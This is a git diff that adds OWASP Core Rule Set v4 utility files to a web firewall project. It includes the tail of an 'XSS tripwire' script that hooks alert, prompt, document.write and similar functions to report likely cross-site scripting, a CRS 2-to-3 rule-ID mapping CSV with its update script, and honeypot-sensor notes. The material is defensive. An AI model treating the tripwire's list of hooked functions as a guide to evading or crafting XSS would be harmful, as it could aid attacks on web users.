(e2) { + // both methods failed + } + } + } + return xmlreq; + }; + + XSSTripwire.proxy = function(obj, name, report_function_name, exec_original) { + var proxy = obj[name]; + obj[name] = function() { + // URL of the page to notify, in the event of a detected XSS event: + XSSTripwire.ReportURL = "xss-tripwire-report?function=" + encodeURIComponent(report_function_name); + + XSSTripwire.report(); + + if (exec_original) { + return proxy.apply(this, arguments); + } + }; + XSSTripwire.lockdown(obj, name); + }; + + XSSTripwire.proxy(window, 'alert', 'window.alert', true); + XSSTripwire.proxy(window, 'confirm', 'window.confirm', true); + XSSTripwire.proxy(window, 'prompt', 'window.prompt', true); + XSSTripwire.proxy(window, 'unescape', 'unescape', true); + XSSTripwire.proxy(document, 'write', 'document.write', true); + XSSTripwire.proxy(String, 'fromCharCode', 'String.fromCharCode', true); + +})(); diff --git a/src/common/core/modsecurity/files/coreruleset/util/change-version/README.md b/src/common/core/modsecurity/files/coreruleset-v4/util/change-version/README.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/change-version/README.md rename to src/common/core/modsecurity/files/coreruleset-v4/util/change-version/README.md diff --git a/src/common/core/modsecurity/files/coreruleset/util/change-version/README.txt b/src/common/core/modsecurity/files/coreruleset-v4/util/change-version/README.txt similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/change-version/README.txt rename to src/common/core/modsecurity/files/coreruleset-v4/util/change-version/README.txt diff --git a/src/common/core/modsecurity/files/coreruleset/util/change-version/change-version.py b/src/common/core/modsecurity/files/coreruleset-v4/util/change-version/change-version.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/change-version/change-version.py rename to src/common/core/modsecurity/files/coreruleset-v4/util/change-version/change-version.py diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/CHANGES b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/CHANGES similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/CHANGES rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/CHANGES diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/README.md b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/README.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/README.md rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/README.md diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/TODO.txt b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/TODO.txt similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/TODO.txt rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/TODO.txt diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test1.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test1.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test1.conf rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test1.conf diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test2.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test2.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test2.conf rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test2.conf diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test3.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test3.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test3.conf rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test3.conf diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test4.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test4.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test4.conf rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test4.conf diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test5.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test5.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test5.conf rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test5.conf diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test6.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test6.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test6.conf rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test6.conf diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test7.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test7.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test7.conf rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test7.conf diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test8.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test8.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test8.conf rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test8.conf diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test9.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test9.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/examples/test9.conf rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/examples/test9.conf diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/requirements.txt b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/requirements.txt similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/requirements.txt rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/requirements.txt diff --git a/src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/rules-check.py b/src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/rules-check.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/crs-rules-check/rules-check.py rename to src/common/core/modsecurity/files/coreruleset-v4/util/crs-rules-check/rules-check.py diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/crs2-renumbering/IdNumbering.csv b/src/common/core/modsecurity/files/coreruleset-v4/util/crs2-renumbering/IdNumbering.csv new file mode 100644 index 000000000..269b88af8 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/util/crs2-renumbering/IdNumbering.csv @@ -0,0 +1,1132 @@ +200000,000000 +200121,000000 +200273,000000 +200280,000000 +200281,000000 +200287,000000 +200289,000000 +200290,000000 +200299,000000 +200316,000000 +200333,000000 +200337,000000 +200350,000000 +200351,000000 +200366,000000 +200367,000000 +200368,000000 +200369,000000 +200370,000000 +200371,000000 +200372,000000 +200373,000000 +200374,000000 +200375,000000 +200376,000000 +200377,000000 +200378,000000 +200379,000000 +200381,000000 +200382,000000 +200383,000000 +200384,000000 +200385,000000 +200386,000000 +200387,000000 +200388,000000 +200389,000000 +200390,000000 +200391,000000 +200392,000000 +200394,000000 +200395,000000 +200396,000000 +200397,000000 +200398,000000 +200399,000000 +200400,000000 +200401,000000 +200402,000000 +200403,000000 +200404,000000 +200405,000000 +200406,000000 +200407,000000 +200408,000000 +200409,000000 +200410,000000 +200411,000000 +200412,000000 +200413,000000 +200414,000000 +200415,000000 +200416,000000 +200417,000000 +200418,000000 +200419,000000 +200420,000000 +200421,000000 +200422,000000 +200423,000000 +200424,000000 +200425,000000 +200426,000000 +200427,000000 +200428,000000 +200429,000000 +200430,000000 +200431,000000 +200432,000000 +200433,000000 +200434,000000 +200435,000000 +200436,000000 +200437,000000 +200438,000000 +200439,000000 +200440,000000 +200441,000000 +200442,000000 +200443,000000 +200445,000000 +200446,000000 +200447,000000 +200448,000000 +200449,000000 +200450,000000 +200451,000000 +200452,000000 +200453,000000 +200454,000000 +200455,000000 +200456,000000 +200457,000000 +200458,000000 +200459,000000 +200460,000000 +200461,000000 +200462,000000 +200463,000000 +200464,000000 +200465,000000 +200466,000000 +200467,000000 +200468,000000 +200469,000000 +200470,000000 +200471,000000 +200472,000000 +200473,000000 +200474,000000 +200475,000000 +200476,000000 +200477,000000 +200478,000000 +200479,000000 +200480,000000 +200481,000000 +200482,000000 +200483,000000 +200484,000000 +200485,000000 +200486,000000 +200487,000000 +200488,000000 +200489,000000 +200490,000000 +200491,000000 +200492,000000 +200493,000000 +200494,000000 +200495,000000 +200496,000000 +200497,000000 +200498,000000 +200499,000000 +200500,000000 +200501,000000 +200502,000000 +200503,000000 +200504,000000 +200505,000000 +200506,000000 +200507,000000 +200508,000000 +200509,000000 +200510,000000 +200511,000000 +200512,000000 +200513,000000 +200514,000000 +200515,000000 +200516,000000 +200517,000000 +200518,000000 +200519,000000 +200520,000000 +200521,000000 +200522,000000 +200523,000000 +200524,000000 +200525,000000 +200526,000000 +200527,000000 +200528,000000 +200529,000000 +200530,000000 +200532,000000 +200533,000000 +200534,000000 +200535,000000 +200536,000000 +200537,000000 +200538,000000 +200539,000000 +200540,000000 +200541,000000 +200542,000000 +200543,000000 +200544,000000 +200545,000000 +200546,000000 +200547,000000 +200548,000000 +200549,000000 +200550,000000 +200551,000000 +200552,000000 +200553,000000 +200554,000000 +200555,000000 +200556,000000 +200557,000000 +200558,000000 +200559,000000 +200560,000000 +200561,000000 +200562,000000 +200563,000000 +200564,000000 +200565,000000 +200566,000000 +200567,000000 +200568,000000 +200569,000000 +200570,000000 +200571,000000 +200572,000000 +200573,000000 +200574,000000 +200575,000000 +200576,000000 +200577,000000 +200578,000000 +200579,000000 +200580,000000 +200581,000000 +200582,000000 +200583,000000 +200584,000000 +200585,000000 +200586,000000 +200587,000000 +200588,000000 +200589,000000 +200590,000000 +200591,000000 +200592,000000 +200593,000000 +200594,000000 +200595,000000 +200596,000000 +200597,000000 +200598,000000 +200599,000000 +200600,000000 +200601,000000 +200602,000000 +200603,000000 +200604,000000 +200605,000000 +200606,000000 +200607,000000 +200608,000000 +200609,000000 +200610,000000 +200611,000000 +200612,000000 +200613,000000 +200614,000000 +200615,000000 +200616,000000 +200617,000000 +200618,000000 +200619,000000 +200620,000000 +200621,000000 +200622,000000 +200623,000000 +200624,000000 +200625,000000 +200626,000000 +200627,000000 +200628,000000 +200629,000000 +200630,000000 +200631,000000 +200632,000000 +200633,000000 +200634,000000 +200635,000000 +200645,000000 +200646,000000 +200647,000000 +200648,000000 +200649,000000 +200650,000000 +200651,000000 +200652,000000 +200653,000000 +200654,000000 +200655,000000 +200656,000000 +200657,000000 +200658,000000 +200659,000000 +200660,000000 +200661,000000 +200662,000000 +200663,000000 +200664,000000 +200665,000000 +200666,000000 +200667,000000 +200668,000000 +200669,000000 +200670,000000 +200671,000000 +200673,000000 +200674,000000 +200675,000000 +200676,000000 +200677,000000 +200678,000000 +200679,000000 +200680,000000 +200681,000000 +200682,000000 +200683,000000 +200684,000000 +200685,000000 +200686,000000 +200687,000000 +200688,000000 +200689,000000 +200690,000000 +200692,000000 +200693,000000 +200694,000000 +200695,000000 +200696,000000 +200697,000000 +200698,000000 +200699,000000 +200700,000000 +200701,000000 +200702,000000 +200703,000000 +200704,000000 +200705,000000 +200706,000000 +200707,000000 +200708,000000 +200709,000000 +200710,000000 +200711,000000 +200712,000000 +200713,000000 +200714,000000 +200718,000000 +200719,000000 +200720,000000 +200721,000000 +200722,000000 +200723,000000 +200724,000000 +200725,000000 +200726,000000 +200727,000000 +200728,000000 +200729,000000 +200730,000000 +200731,000000 +200732,000000 +200733,000000 +200734,000000 +200735,000000 +200736,000000 +200737,000000 +200738,000000 +200739,000000 +200740,000000 +200741,000000 +200742,000000 +200743,000000 +200744,000000 +200745,000000 +200746,000000 +200747,000000 +200748,000000 +200749,000000 +200751,000000 +200752,000000 +200753,000000 +200754,000000 +200755,000000 +200756,000000 +200789,000000 +200865,000000 +200868,000000 +200872,000000 +200882,000000 +200883,000000 +200884,000000 +200885,000000 +200887,000000 +200888,000000 +200889,000000 +200890,000000 +200892,000000 +200893,000000 +200896,000000 +200897,000000 +200899,000000 +200901,000000 +200905,000000 +200906,000000 +200907,000000 +200908,000000 +200910,000000 +200912,000000 +200914,000000 +200916,000000 +200917,000000 +200918,000000 +200919,000000 +200922,000000 +200923,000000 +200930,000000 +200931,000000 +200932,000000 +200933,000000 +200936,000000 +200937,000000 +200938,000000 +200939,000000 +200941,000000 +200942,000000 +200943,000000 +200945,000000 +200946,000000 +200950,000000 +200959,000000 +200964,000000 +200965,000000 +200966,000000 +200967,000000 +200969,000000 +200971,000000 +200972,000000 +200973,000000 +200974,000000 +200975,000000 +200976,000000 +200978,000000 +200979,000000 +200983,000000 +200984,000000 +200987,000000 +200988,000000 +200989,000000 +200990,000000 +200991,000000 +200992,000000 +200993,000000 +200994,000000 +200995,000000 +200996,000000 +200997,000000 +200999,000000 +201001,000000 +201002,000000 +201003,000000 +201004,000000 +201007,000000 +201008,000000 +201009,000000 +201012,000000 +201013,000000 +201014,000000 +201016,000000 +201017,000000 +201018,000000 +201019,000000 +201020,000000 +201022,000000 +201025,000000 +201026,000000 +201027,000000 +201034,000000 +201035,000000 +201036,000000 +201046,000000 +201047,000000 +201048,000000 +201055,000000 +201056,000000 +201061,000000 +201062,000000 +201063,000000 +201064,000000 +201065,000000 +201066,000000 +201070,000000 +201071,000000 +201072,000000 +201075,000000 +201077,000000 +201078,000000 +201080,000000 +201083,000000 +201084,000000 +201085,000000 +201086,000000 +201092,000000 +201094,000000 +201095,000000 +201097,000000 +201098,000000 +201099,000000 +201100,000000 +201101,000000 +201102,000000 +201104,000000 +201105,000000 +201106,000000 +201107,000000 +201108,000000 +201109,000000 +201110,000000 +201111,000000 +201113,000000 +201114,000000 +201115,000000 +201116,000000 +201117,000000 +201119,000000 +201120,000000 +201121,000000 +201125,000000 +201126,000000 +201127,000000 +201137,000000 +201138,000000 +201142,000000 +201145,000000 +201155,000000 +201156,000000 +201157,000000 +201166,000000 +201167,000000 +201172,000000 +201173,000000 +201182,000000 +201183,000000 +201184,000000 +201185,000000 +201187,000000 +201188,000000 +201192,000000 +201193,000000 +201194,000000 +201195,000000 +201200,000000 +201201,000000 +201202,000000 +201203,000000 +201204,000000 +201206,000000 +201207,000000 +201209,000000 +201212,000000 +201213,000000 +201216,000000 +201218,000000 +201219,000000 +201221,000000 +201222,000000 +201233,000000 +201234,000000 +201235,000000 +201236,000000 +201237,000000 +201238,000000 +201239,000000 +201240,000000 +201241,000000 +201242,000000 +201243,000000 +201247,000000 +201248,000000 +201249,000000 +201256,000000 +201257,000000 +201258,000000 +201260,000000 +201265,000000 +201266,000000 +201267,000000 +201268,000000 +201269,000000 +201270,000000 +201271,000000 +201272,000000 +201274,000000 +201275,000000 +201279,000000 +201282,000000 +201283,000000 +201287,000000 +201288,000000 +201294,000000 +201295,000000 +201299,000000 +201308,000000 +201309,000000 +201310,000000 +201311,000000 +201312,000000 +201313,000000 +201315,000000 +201322,000000 +201323,000000 +201330,000000 +201331,000000 +201342,000000 +201343,000000 +201346,000000 +201347,000000 +900001,000000 +900002,000000 +900003,000000 +900004,000000 +900005,000000 +900006,000000 +900007,000000 +900008,000000 +900009,000000 +900010,000000 +900011,000000 +900012,000000 +900013,000000 +900014,000000 +900015,000000 +900016,000000 +900017,000000 +900018,000000 +900019,000000 +900020,000000 +900021,000000 +900030,000000 +900031,000000 +900032,000000 +900033,000000 +900034,000000 +900035,000000 +900036,000000 +900037,000000 +900038,000000 +900039,000000 +900040,000000 +900041,000000 +900042,000000 +900043,000000 +900044,000000 +900045,000000 +900046,000000 +900047,000000 +900048,000000 +900050,910100 +900051,910110 +900051,910120 +910006,000000 +910007,000000 +910008,000000 +920005,000000 +920006,000000 +920007,000000 +920008,000000 +920009,000000 +920010,000000 +920011,000000 +920012,000000 +920013,000000 +920014,000000 +920015,000000 +920016,000000 +920017,000000 +920018,000000 +920019,000000 +920020,000000 +920021,000000 +920022,000000 +920023,000000 +950000,943120 +950001,942150 +950002,000000 +950003,943110 +950005,930120 +950006,000000 +950007,000000 +950008,000000 +950009,943100 +950010,000000 +950011,000000 +950012,921100 +950018,000000 +950019,000000 +950020,000000 +950103,930100 +950104,930110 +950107,920220 +950108,920240 +950109,920230 +950110,000000 +950115,000000 +950116,920260 +950117,931100 +950118,931110 +950119,931120 +950120,931130 +950801,920250 +950901,942130 +950907,932100 +950908,000000 +950910,921120 +950911,921130 +950912,921140 +950913,921150 +950914,921160 +950915,921110 +950921,000000 +950922,000000 +950923,000000 +958000,000000 +958001,000000 +958002,000000 +958003,000000 +958004,000000 +958005,000000 +958006,000000 +958007,000000 +958008,000000 +958009,000000 +958010,000000 +958011,000000 +958012,000000 +958013,000000 +958016,000000 +958017,000000 +958018,000000 +958019,000000 +958020,000000 +958022,000000 +958023,000000 +958024,000000 +958025,000000 +958026,000000 +958027,000000 +958028,000000 +958030,000000 +958031,000000 +958032,000000 +958033,000000 +958034,000000 +958036,000000 +958037,000000 +958038,000000 +958039,000000 +958040,000000 +958041,000000 +958045,000000 +958046,000000 +958047,000000 +958049,000000 +958051,000000 +958052,000000 +958054,000000 +958056,000000 +958057,000000 +958059,000000 +958230,920190 +958231,920200 +958291,000000 +958295,920210 +958297,000000 +958404,000000 +958405,000000 +958406,000000 +958407,000000 +958408,000000 +958409,000000 +958410,000000 +958411,000000 +958412,000000 +958413,000000 +958414,000000 +958415,000000 +958416,000000 +958417,000000 +958418,000000 +958419,000000 +958420,000000 +958421,000000 +958422,000000 +958423,000000 +958976,000000 +958977,933110 +958978,933000 +958979,933120 +958980,933130 +959070,942380 +959071,942390 +959072,942400 +959073,942410 +959151,933100 +960000,920120 +960001,000000 +960002,000000 +960003,000000 +960006,920330 +960007,920290 +960008,920280 +960009,920320 +960010,920420 +960011,920170 +960012,920180 +960014,000000 +960015,920300 +960016,920160 +960017,920350 +960018,000000 +960020,000000 +960021,920310 +960022,000000 +960024,942460 +960032,911100 +960034,920430 +960035,920440 +960038,920450 +960208,920370 +960209,920360 +960335,920380 +960341,920390 +960342,920400 +960343,920410 +960901,920270 +960902,000000 +960904,920340 +960911,920100 +960912,920130 +960913,000000 +960914,920140 +960915,920150 +970003,951100 +970004,954120 +970007,000000 +970008,000000 +970009,953100 +970010,000000 +970011,000000 +970012,000000 +970013,950130 +970014,952100 +970015,953110 +970016,000000 +970017,952110 +970017,954100 +970018,000000 +970021,000000 +970118,954110 +970901,950100 +970902,953120 +970903,000000 +970904,954130 +973300,941320 +973301,000000 +973302,000000 +973303,000000 +973304,000000 +973305,000000 +973306,000000 +973307,000000 +973308,000000 +973309,000000 +973310,000000 +973311,000000 +973312,000000 +973313,000000 +973314,000000 +973315,941190 +973316,000000 +973317,941300 +973318,941290 +973319,941310 +973320,941280 +973321,941270 +973322,941250 +973323,941240 +973324,941230 +973325,000000 +973326,941200 +973327,000000 +973328,000000 +973329,000000 +973330,000000 +973331,000000 +973332,941330 +973333,941340 +973334,000000 +973335,000000 +973336,941110 +973337,941120 +973338,941140 +973339,941130 +973340,941160 +973341,941170 +973342,941180 +973343,941100 +973344,941100 +973345,941220 +973346,941210 +973347,000000 +973348,941260 +973350,941150 +981000,000000 +981001,000000 +981003,000000 +981004,000000 +981005,000000 +981006,000000 +981007,000000 +981018,000000 +981020,901100 +981021,901110 +981022,000000 +981033,000000 +981034,000000 +981035,000000 +981036,000000 +981037,000000 +981038,000000 +981039,000000 +981040,000000 +981041,000000 +981042,000000 +981043,000000 +981044,912120 +981045,912130 +981046,912140 +981047,912150 +981048,912160 +981049,912170 +981050,000000 +981051,000000 +981052,000000 +981053,000000 +981054,000000 +981055,000000 +981056,000000 +981057,000000 +981058,000000 +981059,000000 +981060,000000 +981061,000000 +981062,000000 +981063,000000 +981064,000000 +981075,000000 +981076,000000 +981077,000000 +981078,000000 +981079,000000 +981080,000000 +981081,000000 +981082,000000 +981083,000000 +981084,000000 +981085,000000 +981086,000000 +981087,000000 +981088,000000 +981089,000000 +981090,000000 +981091,000000 +981092,000000 +981093,000000 +981094,000000 +981095,000000 +981096,000000 +981097,000000 +981098,000000 +981099,000000 +981100,000000 +981101,000000 +981102,000000 +981103,000000 +981104,000000 +981105,000000 +981110,000000 +981131,000000 +981132,000000 +981133,000000 +981134,000000 +981136,000000 +981137,000000 +981138,910140 +981139,910190 +981140,910000 +981141,910150 +981142,910160 +981143,910170 +981144,910180 +981145,000000 +981172,942420 +981173,942430 +981175,949100 +981176,949190 +981177,000000 +981178,000000 +981179,949110 +981180,949120 +981181,949130 +981182,949140 +981183,949150 +981184,949160 +981185,000000 +981186,949170 +981187,949180 +981188,000000 +981189,000000 +981190,000000 +981191,000000 +981192,000000 +981193,000000 +981194,000000 +981195,000000 +981196,000000 +981197,000000 +981198,000000 +981199,000000 +981200,959100 +981201,980100 +981202,980110 +981203,980120 +981204,980130 +981205,980140 +981219,000000 +981220,000000 +981221,000000 +981222,000000 +981223,000000 +981224,000000 +981227,920110 +981228,000000 +981229,000000 +981230,000000 +981231,942440 +981235,000000 +981236,000000 +981237,000000 +981238,000000 +981239,000000 +981240,942300 +981241,942230 +981242,942330 +981243,942370 +981244,942180 +981245,942260 +981246,942340 +981247,942360 +981248,942210 +981249,942310 +981250,942170 +981251,942350 +981252,942240 +981253,942320 +981254,942280 +981255,942190 +981256,942250 +981257,942200 +981260,942450 +981261,942100 +981270,942290 +981272,942160 +981276,942270 +981277,942220 +981300,000000 +981301,000000 +981302,000000 +981303,000000 +981304,000000 +981305,000000 +981306,000000 +981307,000000 +981308,000000 +981309,000000 +981310,000000 +981311,000000 +981312,000000 +981313,000000 +981314,000000 +981315,000000 +981316,000000 +981317,000000 +981318,942110 +981319,942120 +981320,942140 +981400,000000 +981401,000000 +981402,000000 +981403,000000 +981404,000000 +981405,000000 +981406,000000 +981407,000000 +990002,913100 +990012,000000 +990901,913110 +990902,913120 +999003,000000 +999004,000000 +999005,000000 +999006,000000 +999008,000000 +999010,000000 +999011,000000 +9700010,951110 +9700011,951120 +9700012,951130 +9700013,951140 +9700014,951150 +9700015,951160 +9700016,951170 +9700017,951180 +9700018,951190 +9700019,951200 +9700020,951210 +9700021,951220 +9700022,951230 +9700023,951240 +9700024,951250 +9700025,951260 diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/crs2-renumbering/README b/src/common/core/modsecurity/files/coreruleset-v4/util/crs2-renumbering/README new file mode 100644 index 000000000..fd1861dd2 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/util/crs2-renumbering/README @@ -0,0 +1,30 @@ +CRS 2.x to 3.x migration utility +================================ + +In CRS 3.0, we have renumbered the rules to be more logical and helpful. +The new rule file names now correspond with the rule IDs in the file. +First rule of a given file is usually 9XX100, then the rules continue +in steps of ten. Related rules/siblings follow with a single digit +change (9XX101, etc.). + +This utility replaces CRS 2 ruleIds with their CRS 3 counterparts. +You can use it when migrating your CRS 2 exclusion/.conf files to CRS 3.0 +or higher. + +Example usage: + + ./update.py -f your_old_modsec_conf.conf + +Rules which have been removed in CRS 3 are listed with the new ID 000000 in the +CSV file. This means that the former rule is no longer part of CRS 3. If after +replacement you find a string 000000 in your config files, you can likely +remove that exclusion or special case. + +If you want to create your own tooling for this migration, you can use +the file idNumbering.csv in this directory. It lists the old rule IDs of +CRS 2.2, together with the corresponding rule IDs in CRS 3.0. + +A rule renumbering is painful for all existing installations. But we really +think that the rule IDs lacked sense and reason, and we are confident future +maintenance will be much easier once this is done. We do not plan to change +rule IDs after this. We appreciate your understanding in this matter. diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/crs2-renumbering/update.py b/src/common/core/modsecurity/files/coreruleset-v4/util/crs2-renumbering/update.py new file mode 100755 index 000000000..42ea75b96 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/util/crs2-renumbering/update.py @@ -0,0 +1,55 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- + +"""This is designed to convert 2.x CRS ID numbering to 3.x CRS numbering""" +from __future__ import print_function +import csv +import argparse +import os +import sys + +def main(): + """Main function that contains all the logic to relabel CRS IDs""" + + id_translation_file = os.path.join(sys.path[0], "IdNumbering.csv") + + if not os.path.isfile(id_translation_file): + sys.stderr.write("We were unable to locate the ID translation CSV (idNumbering.csv) \ + please place this is the same directory as this script\n") + sys.exit(1) + + parser = argparse.ArgumentParser(description="A program that takes in an exceptions file \ + and renumbers all the ID to match OWASP CRS 3 numbers. Output will be directed to STDOUT.") + parser.add_argument("-f", "--file", required=True, action="store", dest="fname", \ + help="the file to be renumbered") + args = parser.parse_args() + + if not os.path.isfile((args.fname).encode('utf8')): + sys.stderr.write("We were unable to find the file you were trying to update the ID numbers \ + in, please check your path\n") + sys.exit(1) + + fcontent = "" + + try: + update_file = open((args.fname).encode('utf-8'), "r") + try: + fcontent = update_file.read() + finally: + update_file.close() + except IOError: + sys.stderr.write("There was an error opening the file you were trying to update") + + if fcontent != "": + # CSV File + id_csv_file = open(id_translation_file, 'rt') + try: + reader = csv.reader(id_csv_file) + for row in reader: + fcontent = fcontent.replace(row[0], row[1]) + finally: + id_csv_file.close() + print(fcontent) + +if __name__ == "__main__": + main() diff --git a/src/common/core/modsecurity/files/coreruleset/util/find-max-datalen-in-tests/README.md b/src/common/core/modsecurity/files/coreruleset-v4/util/find-max-datalen-in-tests/README.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/find-max-datalen-in-tests/README.md rename to src/common/core/modsecurity/files/coreruleset-v4/util/find-max-datalen-in-tests/README.md diff --git a/src/common/core/modsecurity/files/coreruleset/util/find-max-datalen-in-tests/find_max_datalen.py b/src/common/core/modsecurity/files/coreruleset-v4/util/find-max-datalen-in-tests/find_max_datalen.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/find-max-datalen-in-tests/find_max_datalen.py rename to src/common/core/modsecurity/files/coreruleset-v4/util/find-max-datalen-in-tests/find_max_datalen.py diff --git a/src/common/core/modsecurity/files/coreruleset/util/find-rules-without-test/README.md b/src/common/core/modsecurity/files/coreruleset-v4/util/find-rules-without-test/README.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/find-rules-without-test/README.md rename to src/common/core/modsecurity/files/coreruleset-v4/util/find-rules-without-test/README.md diff --git a/src/common/core/modsecurity/files/coreruleset/util/find-rules-without-test/find-rules-without-test.py b/src/common/core/modsecurity/files/coreruleset-v4/util/find-rules-without-test/find-rules-without-test.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/find-rules-without-test/find-rules-without-test.py rename to src/common/core/modsecurity/files/coreruleset-v4/util/find-rules-without-test/find-rules-without-test.py diff --git a/src/common/core/modsecurity/files/coreruleset/util/find-rules-without-test/requirements.txt b/src/common/core/modsecurity/files/coreruleset-v4/util/find-rules-without-test/requirements.txt similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/find-rules-without-test/requirements.txt rename to src/common/core/modsecurity/files/coreruleset-v4/util/find-rules-without-test/requirements.txt diff --git a/src/common/core/modsecurity/files/coreruleset/util/fp-finder/english-extended.txt b/src/common/core/modsecurity/files/coreruleset-v4/util/fp-finder/english-extended.txt similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/fp-finder/english-extended.txt rename to src/common/core/modsecurity/files/coreruleset-v4/util/fp-finder/english-extended.txt diff --git a/src/common/core/modsecurity/files/coreruleset/util/fp-finder/spell.sh b/src/common/core/modsecurity/files/coreruleset-v4/util/fp-finder/spell.sh similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/fp-finder/spell.sh rename to src/common/core/modsecurity/files/coreruleset-v4/util/fp-finder/spell.sh diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/geo-location/README b/src/common/core/modsecurity/files/coreruleset-v4/util/geo-location/README new file mode 100644 index 000000000..b9018fb90 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/util/geo-location/README @@ -0,0 +1,5 @@ +License +The GeoLite databases are distributed under the Creative Commons Attribution-ShareAlike 3.0 Unported License. The attribution requirement may be met by including the following in all advertising and documentation mentioning features of or use of this database: + +This product includes GeoLite data created by MaxMind, available from + http://www.maxmind.com. diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/honeypot-sensor/README.md b/src/common/core/modsecurity/files/coreruleset-v4/util/honeypot-sensor/README.md new file mode 100644 index 000000000..66fc6af9b --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/util/honeypot-sensor/README.md @@ -0,0 +1,14 @@ +The purpose of these files is to turn your current ModSecurity host into +a pseudo-honeypot sensor by doing the following: + +1. Instructs Apache to listen for traffic on multiple unused ports + - 8000 + - 8080 + - 8888 +2. Creates Apache virtual host containers to bind to these ports. +3. If any traffic is received on these ports, then ModSecurity will + inspect the traffic by inheriting any rules specified in the main + Apache configuration. +4. ModSecurity's Audit Engine will use the mlogc program to forward + the audit log entry onto the ModSecurity Project's central logging + server. diff --git a/src/common/core/modsecurity/files/coreruleset-v4/util/honeypot-sensor/mlogc-honeypot-sensor.conf b/src/common/core/modsecurity/files/coreruleset-v4/util/honeypot-sensor/mlogc-honeypot-sensor.conf new file mode 100644 index 000000000..b4afad140 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/util/honeypot-sensor/mlogc-honeypot-sensor.conf @@ -0,0 +1,97 @@ +########################################################################## +# 